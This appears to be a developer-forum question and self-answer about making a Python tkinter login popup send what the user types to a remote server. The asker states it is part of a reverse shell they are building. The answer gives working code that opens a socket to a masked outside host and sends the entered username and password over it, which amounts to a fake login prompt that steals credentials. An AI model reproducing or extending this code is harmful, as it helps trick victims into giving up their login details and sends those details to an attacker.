# send input from tkinter through socket

Tags: python, shell, sockets, tkinter, reverse

This is a simple GUI program, i would like to be able to send the user input through socket in my reverse shell but im kinda stumped. Any help would be greatly appreciated :)

```
from tkinter import *
import tkinter.messagebox as box

def dialog1():
username=entry1.get()
    password = entry2.get()
    if (username == 'admin' and  password == 'secret'):
        box.showinfo('info','Correct Login')
    else:
        box.showinfo('info','Invalid Login')


window = Tk()
window.title('Countries Generation')

frame = Frame(window)

Label1 = Label(window,text = 'Username:')
Label1.pack(padx=15,pady= 5)

entry1 = Entry(window,bd =5)
entry1.pack(padx=15, pady=5)


Label2 = Label(window,text = 'Password: ')
Label2.pack(padx = 15,pady=6)

entry2 = Entry(window, bd=5)
entry2.pack(padx = 15,pady=7)


btn = Button(frame, text = 'Check Login',command = dialog1)


btn.pack(side = RIGHT , padx =5)
frame.pack(padx=100,pady = 19)
window.mainloop()
```

Comment: What do you mean by `send the user input`? From the GUI to a server? From a external program to the GUI?

Comment: yea client has popup GUI wich is activated by commands from server, client inputs username, password into input fields and its sent to server. Its part of my reverse shell that i am making at the moment

Answer (score 0):

Yes i answered it myself, very easy my brain must of just been having a moment lol, for anyone else who is wondering how to do this, username.entry1.get() and password.entry2.get() you send that over in socket like you normally would a variable basically :)

```
host = 'xxx.xxx.xx.x'
port = 5000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))


def dialog1():
    username=entry1.get()
    password = entry2.get()
    if (username == 'admin' and  password == 'secret'):
        box.showinfo('info','Correct Login')
        s.send(bytes(username,'utf8'))
        s.send(bytes(password, 'utf8'))

    else:
        box.showinfo('info','Invalid Login')
```